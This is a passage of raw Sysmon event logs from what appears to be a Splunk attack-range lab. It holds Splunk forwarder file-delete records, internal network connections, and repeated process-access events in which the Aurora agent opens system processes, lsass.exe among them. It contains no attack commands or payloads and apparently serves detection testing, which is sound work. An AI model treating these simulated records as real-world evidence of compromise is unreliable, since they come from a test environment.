Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13EE0A38AACCBD5AB4A56EE699839601,SHA256=5C3A3A5F214C949B0FD8A8FF424899129AE8700E5C7A21160B005B53BED41CA8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017881Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:07.802{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD21E2D3BDCBA08F575125A6709058DC,SHA256=5C5C0C53E3BE54DFDB6BB7BDBEE0C12B4863AE00BB29D26FF0F07D30C201D09A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:08.921{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3FA7724DC3CB1861D6D773B7CD838C3,SHA256=940D303269B2A551EEDCD5C36FDE0A56DB2A67CEC3D7AD0576B649C1BE082F15,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017882Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:08.876{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3CAF6A920DE42656E330EB5A3553475,SHA256=3E25DD7B9CAE48B803D8A2F32CF234609164A52F10B7D98A89E3C6C888A507B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:05.677{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56427-false10.0.1.12-8000- 23542300x800000000000000017884Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:09.963{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA73B724A6D97E5E7C477123A299733D,SHA256=C4C0861A7633C1AE62150674BE18456E9AB798F91331A8510A833A55F3C97113,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000017883Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:07.968{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50156-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000045485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:10.015{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DDB49614A51919108489D244DA35DF7,SHA256=601243BB33AFA9A7DD9A0BCD73ED5F1F820B41D6D0D08E5ABDC56DBA18B0DF99,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.895{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.893{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.888{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.887{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.883{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.871{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045503Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.861{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045502Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045501Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.857{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045500Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.855{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045499Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.828{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045498Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.824{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.819{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.808{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.801{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.767{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.752{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.745{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.708{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000045487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.706{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000045486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:11.101{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=076CA7600B2F2F178C67A434160DE570,SHA256=D6F69BBEA7B5C4E6A72AA971A2A6BDB39B49A7DC9059C20B84B3ACF30E93CC50,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017885Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:11.044{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74DA7C4E14CA42D5D6BC8306A8959D79,SHA256=7635ED0B14693FC2ADA3B79D92E1E4563EDC9AB44FDC2BB580A6928307D18288,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:12.245{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000045511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:12.161{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 